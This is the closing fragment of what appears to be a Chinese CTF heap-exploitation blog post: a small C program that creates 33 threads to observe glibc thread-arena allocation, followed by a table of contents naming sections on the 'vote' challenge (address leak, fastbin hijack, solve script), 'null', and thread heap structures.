num = 0;
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
printf("this is a test for thread arena! %d\n",num);

for(i = 0; i<33;i++){
pthread_create(&tid[i],NULL,thread_func,NULL);
}
a = malloc(0x80);
printf("[*] main malloc address %p\n",a);
for(i = 0; i<33;i++){
//pthread_create(&tid[i],NULL,thread_func,NULL);
pthread_join(tid[i],0);
}
sleep(10);
}

文章目录
  1. 1. vote
    1. 1.1. 题目分析
    2. 1.2. 漏洞利用
      1. 1.2.1. 地址泄露
      2. 1.2.2. Fastbin劫持
      3. 1.2.3. 解题脚本
  2. 2. null
  3. 3. 线程堆块分配
    1. 3.0.1. 名词解释
    2. 3.0.2. 数据结构
    3. 3.0.3. 结构组织
|